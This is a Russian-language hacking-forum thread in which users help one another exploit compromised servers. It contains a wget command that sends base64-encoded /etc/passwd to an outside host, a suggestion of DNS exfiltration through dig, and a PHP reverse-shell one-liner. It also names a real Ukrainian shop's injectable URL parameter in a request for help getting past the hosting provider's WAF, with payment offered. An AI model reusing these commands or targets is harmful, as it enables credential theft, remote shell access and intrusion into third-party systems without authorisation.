03.04.2019, 21:26
|
|
Участник форума
Регистрация: 01.12.2016
Сообщений: 217
С нами:
4973366
Репутация:
13
|
|
Сообщение от auth_root
↑
Покажи на примере плз, как. %7c работает.
ls -l | awk 'NR==12' - показать двенадцатую строку из выдачи
|
|
|
03.04.2019, 22:06
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
С нами:
10227206
Репутация:
2163
|
|
auth_root, длина строки ответа различается, можешь попробовать
cat index.php | base64
или перенаправить вывод на свой сервер
wget " http://hek.ru/?log={`cat /etc/passwd | base64`}"
но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
04.04.2019, 00:05
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
С нами:
8566197
Репутация:
18
|
|
Сообщение от BillyBons
↑
ls -l | awk 'NR==12' - показать двенадцатую строку из выдачи
Да, так работает, спасибо. =) Чуствую спалят раньше, чем я переберу эту огромную массу информации построчно.
Сообщение от l1ght
↑
auth_root
, длина строки ответа различается, можешь попробовать
cat index.php | base64
или перенаправить вывод на свой сервер
wget "
http://hek.ru/?log=
{`cat /etc/passwd | base64`}"
но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше
wget (maybe в моих кривых руках) не работает. Base64 так же выводит всего по одной строке еще и обрезаной. Как запилить бэкконнект? Добавить в файл? Не редачит он существующие, пустые не создает, wget и curl не воркает у меня. Я Очень давно этим не занимался. Тут подбили края
|
|
|
|
04.04.2019, 00:18
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами:
5797046
Репутация:
40
|
|
Сообщение от l1ght
↑
auth_root
, длина строки ответа различается, можешь попробовать
cat index.php | base64
или перенаправить вывод на свой сервер
wget "
http://hek.ru/?log=
{`cat /etc/passwd | base64`}"
но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше
Ты натолкнул на идею. через днс на свой сервак. dig то есть в линухе
|
|
|
|
04.04.2019, 00:27
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
С нами:
8566197
Репутация:
18
|
|
Сообщение от BabaDook
↑
Ты натолкнул на идею. через днс на свой сервак. dig то есть в линухе
Как реализовать, покажите плз неумному =(
|
|
|
|
04.04.2019, 04:07
|
|
Новичок
Регистрация: 30.01.2019
Сообщений: 15
С нами:
3835766
Репутация:
3
|
|
Сообщение от auth_root
↑
Как запилить бэкконнект?
Код:
php -r '$sock=fsockopen("127.0.0.1",65536);exec("/bin/sh -i &3 2>&3");'
|
|
|
|
04.04.2019, 09:30
|
|
Участник форума
Регистрация: 23.03.2017
Сообщений: 265
С нами:
4812086
Репутация:
119
|
|
Ну вообще, там речь про системные команды, а не php RCE )
|
|
|
|
04.04.2019, 22:42
|
|
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами:
5710646
Репутация:
24
|
|
Чем искать NoSQL Injection сканер бурпа умеет? есть расширения под ним?
|
|
|
|
05.04.2019, 02:09
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
С нами:
9979143
Репутация:
-5
|
|
Сообщение от kacergei
↑
Можете пожалуйста подсказать по данной sql-injection:
Код:
igum.com.ua/index.php?route=product/search_auto&tab=all_tire&height=5&diameter=6&season=%D0%B2%D1%81%D0%B5%D1%81%D0%B5%D0%B7%D0%BE%D0%BD%D0%BD%D0%B0%D1%8F&type=%D0%B2%D0%BD%D0%B5%D0%B4%D0%BE%D1%80%D0%BE%D0%B6%D0%BD%D0%B8%D0%BA&brand=68&autotype=all&width=1
Параметр: width
Через sqlmap не удалось что с тамперами, что без
Пробовал в ручную, но так и не сообразил как обойти и что конкретно фильтруется
обратил внимание что фильтрует
AND
,
OR и что то еще =( хотя могу ошибаться
Может кто-то уже сталкивался с WAF'ом данного хостера( hostsila
А то уже третий хост попадается этот и как в стену((
Может кто подскажет по данному вопросу?
PS: В какой ветке можно разместить пост, из разряда помощь со скулей, скину на пиво(
А то подобных тем не видел в услугах(
|
|
|
|
05.04.2019, 19:56
|
|
Новичок
Регистрация: 30.01.2019
Сообщений: 15
С нами:
3835766
Репутация:
3
|
|
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
